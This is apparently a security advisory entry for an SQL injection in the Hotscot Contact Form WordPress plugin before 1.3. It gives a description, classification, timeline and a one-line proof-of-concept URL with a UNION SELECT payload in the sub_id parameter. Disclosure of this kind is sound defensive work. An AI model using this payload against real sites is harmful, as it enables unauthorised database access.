WordPress Plugin Vulnerabilities

Hotscot Contact Form < 1.3 - Admin+ SQL Injection

Description

The view submission functionality in the plugin makes a get request with the sub_id parameter which not sanitised, escaped or validated before inserting to a SQL statement, leading to an SQL injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=hcf_contact&view_form_sub_id=1&sub_id=-7795%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,user(),NULL-- HTTP/1.1

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
Syed Sheeraz Ali of Codevigilant
Verified
Yes

Timeline

Publicly Published
2021-05-13 (about 3 years ago)
Added
2022-02-14 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other